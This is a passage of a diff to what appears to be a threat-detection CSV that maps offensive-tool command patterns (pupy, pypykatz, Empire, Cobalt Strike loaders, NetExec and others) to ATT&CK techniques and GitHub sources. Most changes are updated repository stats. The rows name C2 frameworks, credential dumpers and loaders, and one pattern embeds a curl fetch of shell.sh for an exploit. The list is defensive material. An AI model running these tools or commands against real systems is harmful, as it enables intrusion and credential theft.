- T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*pyexec --file*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pyexec -c *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*pyexec --file*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*PyExec-main.*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*pygpoabuse * -hashes lm:* -gpo-id *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*pygpoabuse.py*","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","8","2","178","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" +"*pygpoabuse.py*","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","8","2","180","26","2023-01-20T19:02:09Z","2020-05-10T21:21:27Z" "*pyherion.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","0","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" +"*pyinstaller netexec.spec*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*pyLAPS.py --action get -d * -u * -p * --dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*pyLAPS-main*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" "*pyMalleableC2*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" @@ -15423,7 +15593,7 @@ "*pypykatz.lsadecryptor*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*pypykatz.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*pypykatz.registry*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*pypykatz_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*pypykatz_handler.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*pypykatz_rekall.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*pypykatzClass*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*pypykatzfile*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" @@ -15450,11 +15620,11 @@ "*python st.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*python tinar.py*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*python* pachine.py*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" -"*python*charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*python*charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*python*http://*:6970/ConfigFileCacheList.txt*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python*'http://*SEP*:6970/*.cnf.xml*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*python*https://*:8443/cucm-uds/users?name=*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"*python_modules/keyboard.zip*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*python_modules/keyboard.zip*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*python2??/generator.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python2??/PyLoader.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3 ./exp.py --url http://*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" @@ -15462,43 +15632,43 @@ "*python3 gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" "*python3 GetHash.py NtCreateFile*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*python3 -m orbitaldump *","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" -"*python3 -m S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*python3 -m S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" "*python3 Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*python3 pacu.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*python3 pacu.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*python3 rsf.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*python3 scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*python3 sitadel*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" "*python3 st client wss://*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*python3 st.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*python3*.exe .\nxc*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*python3*.exe .\nxc*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*python3??/generator.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*python3??/PyLoader.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 